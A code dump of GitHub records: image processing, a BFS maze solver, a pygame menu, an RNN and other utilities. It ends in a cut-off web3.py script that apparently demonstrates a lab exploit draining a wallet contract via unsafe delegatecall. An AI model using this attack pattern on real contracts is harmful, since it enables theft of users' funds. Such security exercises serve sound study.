0)\n\t\t\t\tcc = cc + [thresh[y1:y2,x1:x2]]\n\t\t\t\tcentroid = centroid + [(x1 + x2)/2]\n\t\t\t\tif drawplates:\n\t\t\t\t\tcv2.rectangle(thresh, (x1, y1), (x2, y2), (0,0,255), 1)\t\n\t\t\ti = i + 1\n\t\tidx = np.argsort(centroid)\n\t\tcc = np.array(cc)[idx]\n\t\t#centroid = np.array(centroid)[idx]\n\t\treturn thresh, cc\n\telse:\n\t\treturn thresh, np.empty((0,4))\n\ndef find_coordinates(img, boxes):\n width = img.shape[1]\n height = img.shape[0]\n \n for i in range(len(boxes)):\n box = boxes[i]\n x1 = abs(int((box[0] - box[2] / 2.0) * width))\n y1 = abs(int((box[1] - box[3] / 2.0) * height))\n x2 = int((box[0] + box[2] / 2.0) * width)\n y2 = int((box[1] + box[3] / 2.0) * height)\n return x1, y1, x2, y2\n\n\ndef order_points(pts):\n\n\trect = np.zeros((4, 2), dtype = \"float32\")\n\n\ts = pts.sum(axis = 1)\n\trect[0] = pts[np.argmin(s)]\n\trect[2] = pts[np.argmax(s)]\n \n\n\tdiff = np.diff(pts, axis = 1)\n\trect[1] = pts[np.argmin(diff)]\n\trect[3] = pts[np.argmax(diff)]\n \n\t# return the ordered coordinates\n\treturn rect\n\n\ndef four_point_transform(image, pts):\n\n\trect = order_points(pts)\n\t(tl, tr, br, bl) = rect\n\n\twidthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n\twidthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n\tmaxWidth = max(int(widthA), int(widthB))\n \n\n\theightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n\theightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n\tmaxHeight = max(int(heightA), int(heightB))\n\n\tdst = np.array([\n\t\t[0, 0],\n\t\t[maxWidth - 1, 0],\n\t\t[maxWidth - 1, maxHeight - 1],\n\t\t[0, maxHeight - 1]], dtype = \"float32\")\n \n\t# compute the perspective transform matrix and then apply it\n\tM = cv2.getPerspectiveTransform(rect, dst)\n\twarped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n \n\t# return the warped image\n\treturn warped\n\n\n\ndef plate_detect(frame, boxes, drawplates, maxareathresh, minareathresh):\n\trf = 1\n\t#kernel = np.ones((5,5),np.uint8)\n\tkernel = np.array([[1,2,1],[2,4,2],[1,2,1]], dtype = np.uint8)/16\n\n\tx1, y1, x2, y2 = find_coordinates(frame, boxes)\n\tif x1 == 0 and x2 == 0 and y1 == 0 and y2 == 0:\n\t\tx2, y2 = 1, 1\n\t\n\timg = frame[y1:y2,x1:x2]\n\talphanumerics = []\n\tIclear = np.zeros((10,10))\n\tIopen = np.zeros((10,10))\n\timggray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\t#clahe = cv2.createCLAHE(clipLimit = 2.0, tileGridSize = (8,8))\n\tsh = imggray.shape\n\n\t#original = cv2.resize(original,(sh[1],sh[0]))\n\t#Image enhancement using morphological transformation\n\tret,thresh = cv2.threshold(imggray,60,255,0)\n\tthresh = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel)\n\n\t#Contour detection for detecting the number plate area\n\tif (int(cv2.__version__[0]) < 4):\n\t\tx, contours, hierarchy = cv2.findContours(thresh, 1, 2)\n\telse:\n\t\tcontours, hierarchy = cv2.findContours(thresh, 1, 2)\n\t\t\n\tif len(contours) >0:\n\n\t\tc = max(contours, key=cv2.contourArea)\n\t\textLeft = tuple(c[c[:, :, 0].argmin()][0])\n\t\textRight = tuple(c[c[:, :, 0].argmax()][0])\n\t\textTop = tuple(c[c[:, :, 1].argmin()][0])\n\t\textBot = tuple(c[c[:, :, 1].argmax()][0])\n\t\trect = cv2.minAreaRect(c)\n\t\tpts11 = cv2.boxPoints(rect)\n\t\tbox = np.int0(pts11)*rf\n\t\tp1,p2,p3,p4 = box\n\n\t\tpts = np.array([p1, p2, p3, p4], dtype = \"float32\")\n\n\n\t\tplate = four_point_transform(img,pts)\n\t\t\n\t\timgg = cv2.cvtColor(plate, cv2.COLOR_BGR2GRAY)\n\t\t\n\t\trows = imgg.shape[0]\n\t\tcols = imgg.shape[1]\n\t\t\n\t\timgLog = np.log1p(np.array(imgg, dtype=\"float\") / 255)\n\n\t\t# Create Gaussian mask of sigma = 10\n\t\tM = 2*rows + 1\n\t\tN = 2*cols + 1\n\t\tsigma = 5\n\t\t(X,Y) = np.meshgrid(np.linspace(0,N-1,N), np.linspace(0,M-1,M))\n\t\tcenterX = np.ceil(N/2)\n\t\tcenterY = np.ceil(M/2)\n\t\tgaussianNumerator = (X - centerX)**2 + (Y - centerY)**2\n\n\t\t# Low pass and high pass filters\n\t\tHlow = np.exp(-gaussianNumerator / (2*sigma*sigma))\n\t\tHhigh = 1 - Hlow\n\n\t\t# Move origin of filters so that it's at the top left corner to\n\t\t# match with the input image\n\t\tHlowShift = scipy.fftpack.ifftshift(Hlow.copy())\n\t\tHhighShift = scipy.fftpack.ifftshift(Hhigh.copy())\n\n\t\t# Filter the image and crop\n\t\tIf = scipy.fftpack.fft2(imgLog.copy(), (M,N))\n\t\tIoutlow = scipy.real(scipy.fftpack.ifft2(If.copy() * HlowShift, (M,N)))\n\t\tIouthigh = scipy.real(scipy.fftpack.ifft2(If.copy() * HhighShift, (M,N)))\n\n\t\t# Set scaling factors and add\n\n\t\tgamma1 = 0.3 #0.3\n\t\tgamma2 = 1.5 #1.5\n\t\tIout = gamma1*Ioutlow[0:rows,0:cols] + gamma2*Iouthigh[0:rows,0:cols]\n\n\t\t# Anti-log then rescale to [0,1]\n\t\tIhmf = np.expm1(Iout)\n\t\tIhmf = (Ihmf - np.min(Ihmf)) / (np.max(Ihmf) - np.min(Ihmf))\n\t\tIhmf2 = np.array(255*Ihmf, dtype=\"uint8\")\n\n\t\t# Threshold the image - Anything below intensity 65 gets set to white\n\t\tIthresh = Ihmf2 < 80\n\t\tIthresh = 255*Ithresh.astype(\"uint8\")\n\n\t\t# Clear off the border. Choose a border radius of 5 pixels\n\t\tIclear = imclearborder(Ithresh, 5) #5\n\t\t#cv2.imshow('Cleaned Plate',Iclear)\n\t\t#Iclear = Ithresh\n\t\t# Eliminate regions that have areas below 40 pixels\n\n\t\tthresh = bwareaopen(Iclear, 40) #60\n\t\t\n\t\t#ret, thresh = cv2.threshold(imgg, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n\t\t#thresh = cv2.medianBlur(thresh, 3)\n\t\t#thresh = cv2.bilateralFilter(thresh, 15, 75, 75)\n\t\t\n\t\tthresh, digitbox = find_boxes(thresh, drawplates, maxareathresh, minareathresh)\n\t\t\n\n\treturn thresh, digitbox\n\t\n#cap = cv2.VideoCapture('/home/arihant/Downloads/1.mp4')\n\n#locfile = open('/home/arihant/sih_number_plate-master1/locations.txt','r')\n\n#coor = locfile.readline()\n\n","repo_name":"conspicio-ai/alpr","sub_path":"pytorch-YOLOv4/tool/plateprocessing.py","file_name":"plateprocessing.py","file_ext":"py","file_size_in_byte":10555,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"}
+{"seq_id":"42814315262","text":"# -*- coding: utf-8 -*-\n\"\"\"미로 탐색\n\nN×M크기의 배열로 표현되는 미로가 있다.\n\n1\t0\t1\t1\t1\t1\n1\t0\t1\t0\t1\t0\n1\t0\t1\t0\t1\t1\n1\t1\t1\t0\t1\t1\n미로에서 1은 이동할 수 있는 칸을 나타내고, 0은 이동할 수 없는 칸을 나타낸다. 이러한 미로가 주어졌을 때,\n(1, 1)에서 출발하여 (N, M)의 위치로 이동할 때 지나야 하는 최소의 칸 수를 구하는 프로그램을 작성하시오.\n한 칸에서 다른 칸으로 이동할 때, 서로 인접한 칸으로만 이동할 수 있다.\n\n위의 예에서는 15칸을 지나야 (N, M)의 위치로 이동할 수 있다. 칸을 셀 때에는 시작 위치와 도착 위치도 포함한다.\n\n첫째 줄에 두 정수 N, M(2 ≤ N, M ≤ 100)이 주어진다.\n다음 N개의 줄에는 M개의 정수로 미로가 주어진다. 각각의 수들은 붙어서 입력으로 주어진다.\n\n첫째 줄에 지나야 하는 최소의 칸 수를 출력한다. 항상 도착위치로 이동할 수 있는 경우만 입력으로 주어진다.\n\"\"\"\nfrom collections import deque\n\ndx = (1, 0, -1, 0)\ndy = (0, -1, 0, 1)\n\nn, m = map(int, input().split())\n\nboard = [input() for _ in range(n)]\n\n\ndef is_valid_coord(y, x):\n return 0 <= y < n and 0 <= x < m\n\n\ndef bfs(sy, sx):\n check = [[0] * m for _ in range(n)]\n check[sy][sx] = 1\n q = deque()\n q.append((sy, sx))\n\n while q:\n y, x = q.popleft()\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n if is_valid_coord(ny, nx) and board[ny][nx] == '1' and check[ny][nx] == 0:\n check[ny][nx] = check[y][x] + 1\n q.append((ny, nx))\n return check\n\n\nprint(bfs(0, 0)[n - 1][m - 1])\n","repo_name":"hodoodang/legendary-guacamole","sub_path":"BOJ/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"69832601709","text":"from game.scenes.scene import Scene\n\nfrom game.objects.enemys.koishi_komeiji import KoishiKomeiji\nfrom game.objects.enemys.yukari_yakumo import YukariYakumo\n\nimport pygame\nchapthers = [\n {\n \"name\" : \"The Lost sin in the dark wood\",\n \"enemys\": [KoishiKomeiji],\n \"background\": \"dark-wood\",\n \"music\": \"game-1\",\n \"hp\": 5,\n \"time\": 60,\n \"max_hp\": 5\n },{\n \"name\" : \"The Battle At Temple\",\n \"enemys\": [YukariYakumo],\n \"background\": \"temple\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 90,\n \"max_hp\": 5\n },{\n \"name\" : \"The Battle At Temple(Day)\",\n \"enemys\": [YukariYakumo,KoishiKomeiji],\n \"background\": \"temple_day\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 120,\n \"max_hp\": 5\n },{\n \"name\" : \"The Full Moon Night\",\n \"enemys\": [KoishiKomeiji,YukariYakumo],\n \"background\": \"red-moon\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 120,\n \"max_hp\": 5\n }\n]\n\nclass ChaptherSelectorScene(Scene):\n def __init__(self, engine):\n super().__init__(engine)\n self.tick = 0\n self.current_chapther = 0\n self.current_music = None\n def init(self):\n self.engine.music.play('intro')\n\n for i,chapther in enumerate(chapthers):\n scale_factor = 30\n sprite = self.engine.sprites[chapther[\"background\"]]\n small_image = pygame.transform.smoothscale(sprite[\"image\"], (sprite[\"rect\"].width // scale_factor, sprite[\"rect\"].height // scale_factor))\n chapther[\"background-blurred\"] = pygame.transform.smoothscale(small_image, (self.engine.WIDTH, self.engine.HEIGHT))\n chapther[\"background-resized\"] = pygame.transform.scale(sprite[\"image\"], (self.engine.WIDTH * 0.4, self.engine.HEIGHT * 0.6))\n \n chapther[\"offset_x_target\"] = 0\n if i < self.current_chapther:\n chapther[\"offset_x_target\"] = -self.engine.WIDTH\n elif i > self.current_chapther:\n chapther[\"offset_x_target\"] = self.engine.WIDTH + self.engine.HALF_WIDTH\n chapther[\"offset_x\"] = chapther[\"offset_x_target\"]\n \n return;\n def draw_chapther(self, screen, chapther):\n offset_x = chapther[\"offset_x\"]\n detail = f\"\"\"Level Detail\nenemys: {len(chapther[\"enemys\"])}\nhp: {chapther[\"hp\"]}\nmax_hp: {chapther[\"max_hp\"]}\n\"\"\"\n screen.blit(chapther[\"background-resized\"], ((self.engine.WIDTH*0.1)+ offset_x,self.engine.HEIGHT*0.2))\n screen.draw.text(chapther[\"name\"], topleft=((self.engine.WIDTH*0.53)+ offset_x, self.engine.HEIGHT*0.2), fontsize=48, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(\"Max Time:\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.56), fontsize=72, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(str(chapther[\"time\"]) + \" Seconds\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.65), fontsize=82, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(\"Higest Score:\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.73), fontsize=72, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text((str(chapther[\"higest_score\"] if \"higest_score\" in chapther else 0)).zfill(12), bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.82), fontsize=82, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(detail, topleft=((self.engine.WIDTH*0.53)+ offset_x, self.engine.HEIGHT*0.25), fontsize=32, color=\"white\", owidth=2, ocolor=(39,18,77))\n def draw(self, screen):\n screen.blit(chapthers[self.current_chapther][\"background-blurred\"], (0,0))\n self.draw_chapther(screen,chapthers[self.current_chapther])\n if self.current_chapther > 0: self.draw_chapther(screen,chapthers[self.current_chapther-1])\n if self.current_chapther < len(chapthers) - 1: self.draw_chapther(screen,chapthers[self.current_chapther+1])\n screen.draw.text(\"LEVEL SELECTOR\", center=(self.engine.HALF_WIDTH, self.engine.HEIGHT * 0.1), fontsize=62, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.blit('arrow_left', (0,self.engine.HALF_HEIGHT - 36))\n screen.blit('arrow_right', (self.engine.WIDTH * 0.95,self.engine.HALF_HEIGHT - 36))\n if self.tick // 24 % 2 == 0:\n screen.draw.text(\"Press Enter to start the game!\", center=(self.engine.HALF_WIDTH, self.engine.HEIGHT*0.9), fontsize=32, color=\"white\", owidth=2, ocolor=(39,18,77))\n return;\n def update(self,pygame):\n self.tick += 1\n if self.engine.controller.keyboard_pressed[pygame.K_RETURN]:\n self.engine.sounds.pause.play()\n # self.engine.change_scene(\"CHAPTHER_SELECTER\", background=\"dark-wood\", enemys=[])\n if not self.current_music == chapthers[self.current_chapther][\"music\"]:\n self.current_music = chapthers[self.current_chapther][\"music\"]\n self.engine.music.play(self.current_music)\n for chapther in chapthers:\n chapther[\"offset_x\"] += (chapther[\"offset_x_target\"] - chapther[\"offset_x\"]) / 16\n return;\n def on_key_down(self, key, mod, unicode, pygame):\n if key == pygame.K_a or key == pygame.K_LEFT:\n self.current_chapther -= 1\n if key == pygame.K_d or key == pygame.K_RIGHT:\n self.current_chapther += 1\n if key == pygame.K_RETURN or key == pygame.K_e:\n chapther = chapthers[self.current_chapther]\n self.engine.change_scene(\"GAME\", background=chapther[\"background\"], enemys=chapther[\"enemys\"], music=chapther[\"music\"])\n self.engine.sounds.pause.play()\n if key == pygame.K_ESCAPE:\n self.engine.change_scene(\"INTRO\")\n self.current_chapther = min(max(self.current_chapther,0),len(chapthers)-1)\n chapthers[self.current_chapther][\"offset_x_target\"] = 0\n for i,chapther in enumerate(chapthers):\n if i < self.current_chapther:\n chapther[\"offset_x_target\"] = -self.engine.WIDTH\n elif i > self.current_chapther:\n chapther[\"offset_x_target\"] = self.engine.WIDTH + self.engine.HALF_WIDTH\n","repo_name":"chanios/project-pygame","sub_path":"game/scenes/chapther_selecter.py","file_name":"chapther_selecter.py","file_ext":"py","file_size_in_byte":6270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"33747995759","text":"'''\nTopic class to simulate course topic\nAuthor : Mayuri Wadkar\n'''\n\nfrom Utils import technologies_stopwords, fetch_description_techs\nfrom SummarizationModule import *\nfrom bs4 import BeautifulSoup as Soup\nimport urllib\n\nclass Topic:\n\n def __init__(self):\n self.cluster = None\n self.topic = None\n self.technologies = None\n self.listedTech = None\n self.actionList = None\n self.summary = None\n\n '''\n Function to initiate extraction of course topic, technologies, action lists and summary\n '''\n def set_syllabus_content(self):\n\n job_closest_to_centroid = self.cluster.closest_job_document\n description_of_job_closest_to_centroid, techSet_of_job_closest_to_centroid = fetch_description_techs(job_closest_to_centroid.jobLink)\n title_of_job_closest_to_centroid = job_closest_to_centroid.jobTitle\n\n #integration with NLP\n job_descriptions = \"\"\n # job_titles = \"\"\n technologies = set()\n\n for job in self.cluster.cluster:\n url = job.jobLink\n # print job.jobLink\n joblinkTarget = Soup(urllib.urlopen(url), \"html.parser\")\n techTags = joblinkTarget.findAll('a', attrs={'class': 'post-tag job-link no-tag-menu'})\n for tag in range(len(techTags)):\n tech = str(techTags[tag].get_text())\n if tech not in technologies_stopwords:\n technologies.add(tech)\n\n job_description = joblinkTarget.find('div', attrs={'class': 'description'})\n if job_description != None:\n job_description = job_description.get_text()\n else:\n job_description = joblinkTarget.find('span', attrs={'class': 'summary'})\n if job_description != None:\n job_description = job_description.get_text()\n else:\n job_description = joblinkTarget.find('div', attrs={'itemprop': 'description'})\n if job_description != None:\n job_description = job_description.get_text()\n if job_description != None:\n job_descriptions += job_description\n # job_titles += job.jobTitle\n\n summarizer = SummarizationModule()\n\n self.summary = summarizer.summarize_job_descriptions(job_descriptions)\n self.listedTech, self.actionList = summarizer.get_listed_tech_and_action_list(job_descriptions)\n self.technologies = technologies\n self.topic = summarizer.get_topic(title_of_job_closest_to_centroid)","repo_name":"Mayuri-Wad-012447851/Course-Recommendation-Project","sub_path":"Topic.py","file_name":"Topic.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"33531897299","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nfrom helpers import SqlQueries\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nclass PreProcessAndLoadOperator(BaseOperator):\n\n ui_color = '#F98866'\n\n @apply_defaults\n def __init__(self,\n redshift_table_name,\n redshift_conn_id='redshift',\n month_name = 'October',\n truncate=True,\n *args, **kwargs):\n\n super(PreProcessAndLoadOperator, self).__init__(*args, **kwargs)\n self.table_name=redshift_table_name\n self.redshift_conn_id = redshift_conn_id\n self.truncate = truncate\n self.month_name = month_name\n\n def execute(self, context):\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n \n df = redshift.get_pandas_df(SqlQueries.select_from_table.format(table_name=self.table_name))\n\n df = df.sort_values(['country', 'date'])\n df['confirmed'] = df.groupby(['country'])['confirmed'].diff().fillna(0)\n df['recovered'] = df.groupby(['country'])['recovered'].diff().fillna(0)\n df['deaths'] = df.groupby(['country'])['deaths'].diff().fillna(0)\n df['date'] = pd.to_datetime(df['date'])\n df = df[df['date'].dt.month_name()== self.month_name]\n\n if self.truncate:\n redshift.run(SqlQueries.truncate_table.format(table_name=\"covid_cases\"))\n\n rows = list(df.itertuples(index=False, name=None))\n redshift.insert_rows(table=\"covid_cases\", rows=rows, commit_every=0)\n \n","repo_name":"MBtech/data-eng-capstone","sub_path":"airflow/plugins/operators/preprocess_and_load.py","file_name":"preprocess_and_load.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"11271437231","text":"\r\nimport numpy as np\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom keras.utils import to_categorical\r\n\r\nclass RNN_func:\r\n\t\r\n\tdef __init__(self, word_dim, hidden_dim=4, bptt_truncate=0):\r\n # Khởi tạo thông số cơ bản (vocabulary, lớp ẩn)\r\n\t\tself.word_dim = word_dim\r\n\t\tself.hidden_dim = hidden_dim\r\n\t\tself.bptt_truncate = bptt_truncate\r\n # Khởi tạo thông số mạng ngẫu nhiên\r\n\t\tself.U = np.random.uniform(-np.sqrt(1./word_dim), np.sqrt(1./word_dim), (hidden_dim, word_dim))\r\n\t\tself.V = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (word_dim, hidden_dim))\r\n\t\tself.W = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (hidden_dim, hidden_dim))\r\n\r\n\tdef forward_propagation(self, x):\r\n # Tông số time steps\r\n\t\tT = len(x)\t\t\r\n\t\t# Lưu lại các giá trị lớp ra o và lớp ẩn s để sử dụng sau này\r\n\t\ts = np.zeros((T, self.hidden_dim))\r\n\t\ts[-1] = np.zeros(self.hidden_dim)\r\n\t\t\r\n\t\to = np.zeros((T, self.word_dim))\r\n\t\t# Tính o và s theo công thức\r\n\t\t# s[t] = tanh(U.x[t] + W.s[t-1])\r\n\t\t# o[t] = softmax(V.s[t])\r\n\t\tfor t in np.arange(T):\r\n\t\t \r\n\t\t\ts[t] = np.tanh(self.U[:,x[t]] + self.W.dot(s[t-1]))\r\n\t\t\to[t] = softmax(self.V.dot(s[t]))\r\n\t\treturn [o, s]\r\n \r\n\t\r\n\tdef predict(self, x):\r\n\t\t# Tính lan truyền thuận và với giá trị U, V, W sau khi training để dự đoán kết quả \r\n\t\to, s = self.forward_propagation(x)\r\n\t\ty_pre = np.argmax(o, axis=1) + 1\t\t \r\n\t\treturn y_pre[len(y_pre)-1] \r\n\r\n\r\n\tdef calculate_total_loss(self, x, y):\r\n\t#Tính sai số theo cross-entropy\t\t\t\t\r\n\t\to, s = self.forward_propagation(x)\r\n\t\t#Tạo one-hot vector\r\n\t\ty_temp = to_categorical(y, num_classes=5)\r\n\t\ty_temp = np.delete(y_temp,0,1)\r\n\t\t\r\n\t\tE = (- np.mean(np.sum(y_temp * np.log(o), axis=1)))\r\n\t\t\r\n\t\treturn E \r\n\r\n\r\n\tdef bptt(self, x, y):\r\n\t#Tính backpropagation through time\r\n\t T = len(y)\r\n\t # Tính lan truyền thuận\r\n\t o, s = self.forward_propagation(x)\r\n\t # Đạo hàm sai số theo U, L, W\r\n\t dEdU = np.zeros(self.U.shape)\r\n\t dEdV = np.zeros(self.V.shape)\r\n\t dEdW = np.zeros(self.W.shape)\r\n\t delta_o = o\r\n\t \r\n\t delta_o[np.arange(len(y)), y-1] -= 1\t \r\n\t \r\n\t # Mỗi bước ngược\r\n\t for t in np.arange(T)[::-1]:\r\n\t dEdV += np.outer(delta_o[t], s[t].T)\r\n\t # Khởi tạo delta_t\r\n\t delta_t = self.V.T.dot(delta_o[t]) * (1 - (s[t] ** 2))\r\n\t # Backpropagation through time theo chuỗi ngược liên tiếp \r\n\t for bptt_step in np.arange(max(0, t-self.bptt_truncate), t+1)[::-1]:\t \r\n\t dEdW += np.outer(delta_t, s[bptt_step-1]) \r\n\t dEdU[:,x[bptt_step]] += delta_t\r\n\t # update cho bước kế tiếp\r\n\t delta_t = self.W.T.dot(delta_t) * (1 - s[bptt_step-1] ** 2)\r\n\t return [dEdU, dEdV, dEdW]\r\n \t \r\n\t\r\n\r\n\tdef numpy_sgd_step(self, x, y, learning_rate):\r\n\t\t# tính gradient của sai số\r\n\t\tdEdU, dEdV, dEdW = self.bptt(x, y)\r\n\t\t# Cập nhật trọng số theo gradient\r\n\t\tself.U -= learning_rate * dEdU\r\n\t\tself.V -= learning_rate * dEdV\r\n\t\tself.W -= learning_rate * dEdW\r\n\r\n\t\r\n# SGD Loop\r\n# - model: RNN model \r\n# - X_train: training data set\r\n# - y_train: training data labels\r\n# - learning_rate: Khởi tạo learning rate cho SGD\r\n# - nepoch: số lượng epoch\r\n# - evaluate_loss_after: Đánh giá sai số sau mỗi k epoch\r\ndef train_with_sgd(model, X_train, y_train, learning_rate=0.005, nepoch=100, evaluate_loss_after=1):\r\n # Theo dõi sai số\r\n losses = []\r\n num_examples_seen = 0\r\n for epoch in range(nepoch):\r\n \r\n if (epoch % evaluate_loss_after == 0):\r\n loss = model.calculate_total_loss(X_train, y_train) \r\n losses.append(loss)\r\n \r\n #Chỉnh lại learning rate nếu sai số tăng lên\r\n if (len(losses) > 1 and losses[-1]> losses[-2]):\r\n learning_rate = learning_rate * 0.75 \r\n print (\"Setting learning rate to %f\" % learning_rate)\r\n sys.stdout.flush()\r\n \r\n # One SGD step\r\n model.numpy_sgd_step(X_train, y_train, learning_rate)\r\n num_examples_seen += 1 \r\n \r\n return losses\r\n\r\ndef softmax(x):\r\n#Hàm softmax\r\n xt = np.exp(x - np.max(x))\r\n return xt / np.sum(xt)","repo_name":"luonghuuphuloc/artificial-inteligence-in-control","sub_path":"Recurrent-neural-network/RNN_BPTT/RNN_backpropagation.py","file_name":"RNN_backpropagation.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30502467650","text":"from test.utils import describe, it\nfrom unittest import TestCase, mock\n\nfrom src.adapter.local_file import LocalFileAdapter\n\n\nclass LocalFileTestCase(TestCase):\n @mock.patch(\n \"src.adapter.local_file.open\",\n new=mock.mock_open(read_data=\"filecontent\"),\n )\n @mock.patch(\"src.adapter.local_file.BytesIO\")\n @mock.patch(\"src.adapter.local_file.os\")\n @describe\n def test_uri(self, mock_os, mock_bytesio):\n @it\n def raises_if_the_input_is_not_dir():\n mock_os.path.isfile.return_value = False\n self.assertRaises(\n ValueError, LocalFileAdapter.load, *[\"./an-image\"]\n )\n\n mock_os.path.isfile.return_value = True\n mock_bytesio.return_value = \"some bytes\"\n\n @it\n def loads_a_remote_image():\n result = LocalFileAdapter.load(\"file.jpg\")\n mock_bytesio.assert_called_with(\"filecontent\")\n self.assertEqual(\"some bytes\", result)\n\n @it\n def does_not_load_a_file_with_invalid_extension():\n result = LocalFileAdapter.load(\"file.txt\")\n self.assertEqual(None, result)\n","repo_name":"melnyczuk/supercollager","sub_path":"test/unit/adapter/local_file_test.py","file_name":"local_file_test.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"26710971899","text":"# the extension solver of the 4 = 10 problem\n\"\"\"three or more numbers and operators, goal are given,\n this solver finds the formula that results goal\"\"\"\n \n# MAINTENANCE IS CONSIDERED\n\nfrom operator import truediv\nfrom itertools import permutations, product \n\n############################################\n############# MODIFY HERE ##################\n############################################\n \nnumbers = [3, 4, 7, 8] \noperators = ['+', '-', '*', '/'] \ngoal = 10 \nbracket = False \n \n############################################\n############################################\n############################################\n\n\ndef FindBrackPos(n) :\n tmpPos = []\n for i in range(0, 2 * n - 3, 2) :\n for j in range(2, 2 * n + 1, 2) :\n if j - i > 2 and j - i != 2*n:\n tmpPos.append((i, j))\n return tmpPos\n\n\ndef Solver(nums, opers, goal, bracket=True) :\n n = len(nums)\n brackPos = FindBrackPos(n)\n numList = list(set(permutations(nums, n)))\n operitem = []\n for _ in range(n - 1) :\n operitem.append(opers)\n operitem.append([\"\"])\n operList = list(product(*operitem))\n \n for i in numList :\n for j in operList :\n form = \"\"\n for k in range(n) : form += str(i[k]) + j[k]\n \n try :\n if abs(eval(form) - goal) < 0.01 : print(form)\n except ZeroDivisionError : continue\n \n if bracket : \n for k in brackPos :\n tmpform = form[0:k[0]] + \"(\" + form[k[0]:k[1]-1] + \")\" + form[k[1]-1:2*n+1] \n try :\n if abs(eval(tmpform) - goal) < 0.01 : print(tmpform)\n except ZeroDivisionError : continue \n\nSolver(numbers, operators, goal, bracket)\n","repo_name":"Jenix8/4equal10-Solver","sub_path":"n=m.py","file_name":"n=m.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"7965408400","text":"from web3 import Web3\nfrom web3 import contract as c\n\nfrom solcx import compile_files\n\n\ndef get_contract_abi_bin(contract_file):\n\n compiled_sol = compile_files( contract_file,\n output_values=['abi', 'bin']\n )\n return compiled_sol\n\ndef deploy_contract(abi, bin, target_address = None):\n\n Contract = w3.eth.contract(abi=abi, bytecode=bin)\n if(target_address == None):\n #DEPLOY WALLET WITH 50 Ether\n contract_type = \"WALLET\"\n tx_hash = Contract.constructor().transact({'gasPrice': w3.eth.gas_price,'value': 50000000000000000000})\n else:\n #ELSE DEPLOY ATTACK CONTRACT\n contract_type = \"ATTACKER\"\n tx_hash = Contract.constructor(target_address).transact()\n tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)\n contract = w3.eth.contract(\n address=tx_receipt.contractAddress,\n abi=abi\n )\n print(f\"{contract_type} CONTRACT DEPLOY WITH ADDRESS: {contract.address}\")\n return contract\n\n#### CONNECT WEB3PY TO GANACHE\nw3 = Web3(Web3.HTTPProvider('http://127.0.0.1:8545'))\naccounts = w3.eth.accounts\n\nw3.eth.default_account = accounts[0]\n\ncompiled_contracts = get_contract_abi_bin(\"./WalletSelfDestructableByAnyone.sol\")\n\nfor ctr in compiled_contracts:\n\n if(ctr == 'WalletSelfDestructableByAnyone.sol:Attack'):\n attack_abi_bin = (compiled_contracts[ctr]['abi'], compiled_contracts[ctr]['bin'])\n\n if(ctr == 'WalletSelfDestructableByAnyone.sol:Wallet'):\n wallet_abi_bin = (compiled_contracts[ctr]['abi'], compiled_contracts[ctr]['bin'])\n\n\n##### DEPLOY WALLET WITH ACCOUNT 0\nwallet = deploy_contract(wallet_abi_bin[0], wallet_abi_bin[1])\nwallet = c.ImplicitContract(wallet)\n\n##### DEPLOY ATTACK WITH ACCOUNT 1\nw3.eth.default_account = accounts[1]\nattack_init_balance = w3.eth.get_balance(accounts[1])\nattack = deploy_contract(attack_abi_bin[0], attack_abi_bin[1], wallet.address)\n\nattack_address = attack.address\n\ntry:\n wallet.delegateCallToAnotherContract(attack_address)\nexcept Exception as e:\n print(e)\n print(\"Not owner.\")\n exit(0)\n\nstolen_ether 